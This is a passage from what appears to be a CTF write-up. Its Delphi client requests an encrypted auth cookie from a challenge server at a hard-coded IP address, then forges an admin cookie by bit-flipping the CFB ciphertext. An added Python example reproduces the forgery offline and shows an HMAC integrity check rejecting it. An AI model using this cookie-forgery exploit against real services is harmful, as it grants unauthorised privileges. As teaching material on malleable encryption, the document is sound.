C.IOHandler.Write(AData);
s := 'a';
chunked := False;
ctl := False;
s2 := '';
while s <> '' do
   begin
   s := C.IOHandler.ReadLn;
   if copy(s,1,12) = 'Set-Cookie: ' then
      begin
      if pos(' auth=',s) > 0 then
         begin
         Result := copy(s,pos(' auth=',s) + 6);
         Result := copy(Result,1,pos(';',Result) - 1);
         end;
      end;
   if copy(s,1,16) = 'Content-Length: ' then
      begin
      ctL := True;
      rem := StrToInt(copy(s,17));
      end;
   if s = 'Transfer-Encoding: chunked' then
      chunked := True;
   s2 := s2 + s;
   end;
s := 'a';
s2 := '';
if not chunked then
   begin
   if ctl then
      begin
      s2 := C.IOHandler.ReadString(rem);
      end
      else
      begin
      while C.IOHandler.Readable(1000) do
         begin
         s := C.IOHandler.ReadLn;
         s2 := s2 + s;
         end;
      end;
   end
   else
   begin
   while True do
     begin
     s := C.IOHandler.ReadLn;
     if s = '0' then
        Break;
     rem := StrToInt('$' + s);
     s2 := s2 + C.IOHandler.ReadString(rem);
     s := C.IOHandler.ReadLn;
     end;
   end;
C.Free;
//ShowMessage(Result);
//Result := s2;
end;

function DoGet(cookie: string): string;
var C: TIdTCPClient;
    s,s2: string;
    chunked: Boolean;
    ctL: Boolean;
    rem: integer;
    buff: Array of Byte;
  x: Integer;
    cck: string;
begin
cck := '';
while cookie <> '' do
   begin
   cck := cck + '%' + copy(cookie,1,2);
   cookie := copy(cookie,3);
   end;
rem := 0;
SetLength(buff,1024);
Result := '';
C := TIdTCPClient.Create;
C.Host := '52.69.244.164';
C.Port := 51913;
C.Connect;
C.IOHandler.WriteLn('GET / HTTP/1.1');
C.IOHandler.WriteLn('Host: 52.69.244.164:51913');
C.IOHandler.WriteLn('Cookie: auth=' + cck);
C.IOHandler.WriteLn('Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8');
C.IOHandler.WriteLn('');
s := 'a';
chunked := False;
ctl := False;
s2 := '';
while s <> '' do
   begin
   s := C.IOHandler.ReadLn;
   if copy(s,1,16) = 'Content-Length: ' then
      begin
      ctL := True;
      rem := StrToInt(copy(s,17));
      end;
   if s = 'Transfer-Encoding: chunked' then
      chunked := True;
   s2 := s2 + s;
   end;
s := 'a';
s2 := '';
if not chunked then
   begin
   if ctl then
      begin
      s2 := C.IOHandler.ReadString(rem);
      end
      else
      begin
      while C.IOHandler.Readable(1000) do
         begin
         s := C.IOHandler.ReadLn;
         s2 := s2 + s;
         end;
      end;
   end
   else
   begin
   while True do
     begin
     s := C.IOHandler.ReadLn;
     if s = '0' then
        Break;
     rem := StrToInt('$' + s);
     s2 := s2 + C.IOHandler.ReadString(rem);
     s := C.IOHandler.ReadLn;
     end;
   end;
C.Free;
Result := s2;
end;

procedure TForm3.Button1Click(Sender: TObject);
var s1, s2, s3, s4: string;
    bs: array[1..16] of byte;
    x: Integer;
    ss: string;
    SL: TStringList;
    y: Integer;
    sss: string;
begin
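// Register and fetch the auth cookie (URL-encoded IV + ciphertext).
s4 := DoPost('a','b');
Edit1.Text := s4;
s1 := '';
// URL-decode the cookie into a plain hex string (two hex digits per byte).
while s4 <> '' do
   begin
   if s4[1] = '%' then
      begin
      s1 := s1 + copy(s4,2,2);
      s4 := copy(s4,4);
      end
      else
      begin
      s1 := s1 + IntToHex(ord(s4[1]),2);
      s4 := copy(s4,2);
      end;
   end;
Edit2.Text := s1;
// Sanity check: replay the unmodified cookie.
ShowMessage(DoGet(s1));
// Known plaintext of the third block and the text we want instead
// (padded to 16 characters; only the first 12 are used).
s2 := 'db":"hitcon-ctf"';
s3 := 'admin":true}    ';
// Read cookie bytes 48..63 (0-based): the third ciphertext block, after the 16-byte IV.
for x := 48 to 63 do
    begin
    bs[x - 47] := StrToInt('$' + copy(s1,x * 2 + 1,2));
    end;
// XOR old plaintext ^ new plaintext into the ciphertext block.
for x := 1 to 16 do
    bs[x] := bs[x] xor (ord(s2[x]) xor ord(s3[x]));
// Keep the IV and the first two blocks (48 bytes = 96 hex digits) unchanged,
// append the 12 modified bytes and drop the rest of the cookie.
s4 := copy(s1,1,96);
for x := 1 to 12 do
    s4 := s4 + IntToHex(bs[x],2);
ShowMessage(doget(s4));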
end;

end.
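
The cookie edit described above, reproduced offline next to the missing integrity check, as an added Python example (not the team's code and not the challenge's server code). Assumptions: `prf` is an HMAC-SHA256 stand-in for AES, which works because CFB only ever calls the cipher's encrypt direction; the keys, the IV and all function names are constructed for the illustration.

```python
import hashlib, hmac, json

BLOCK = 16

def prf(key, block):
    # Stand-in for AES_k(block) (assumption: HMAC-SHA256 truncated to 16 bytes).
    # CFB only uses the cipher's encrypt direction, so the malleability is identical.
    return hmac.new(key, block, hashlib.sha256).digest()[:BLOCK]

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))  # zip stops at the shorter input

def cfb(key, iv, data, decrypt):
    # Full-block CFB: c_i = p_i ^ E(c_{i-1}), p_i = c_i ^ E(c_{i-1}), c_0 = IV.
    out, prev = b"", iv
    for i in range(0, len(data), BLOCK):
        chunk = data[i:i + BLOCK]
        res = xor(chunk, prf(key, prev))
        prev = chunk if decrypt else res   # feedback is always the ciphertext block
        out += res
    return out

def issue(enc_key, mac_key, iv, user, password):
    # Cookie layout from the write-up: IV || CFB(json). The tag is the added mitigation.
    body = json.dumps({"username": user, "password": password, "db": "hitcon-ctf"},
                      separators=(",", ":")).encode()
    cookie = iv + cfb(enc_key, iv, body, decrypt=False)
    return cookie, hmac.new(mac_key, cookie, hashlib.sha256).digest()

def read_unauthenticated(enc_key, cookie):
    # Weak form: decrypt and trust whatever JSON comes out.
    return json.loads(cfb(enc_key, cookie[:BLOCK], cookie[BLOCK:], decrypt=True))

def read_authenticated(enc_key, mac_key, cookie, tag):
    # Hardened form (encrypt-then-MAC): verify the tag before decrypting.
    expected = hmac.new(mac_key, cookie, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        raise ValueError("cookie failed integrity check")
    return read_unauthenticated(enc_key, cookie)

def tamper(cookie):
    # What the write-up does, with no key: XOR old^new into bytes 49-60, drop the rest.
    old, new = b'db":"hitcon-ctf"', b'admin":true}'
    return cookie[:48] + xor(cookie[48:60], xor(old, new))

def demo():
    # Constructed keys and IV, for illustration only.
    enc_key, mac_key, iv = b"E" * 16, b"M" * 32, bytes(range(16))
    cookie, tag = issue(enc_key, mac_key, iv, "a", "a")
    forged = tamper(cookie)
    accepted = read_unauthenticated(enc_key, forged)
    try:
        read_authenticated(enc_key, mac_key, forged, tag)
        rejected = False
    except ValueError:
        rejected = True
    return accepted, rejected

if __name__ == "__main__":
    print(demo())
```

Truncating after the modified bytes is what keeps the garbled following block out of the JSON; with the tag verified first, the modified cookie never reaches the decryption step.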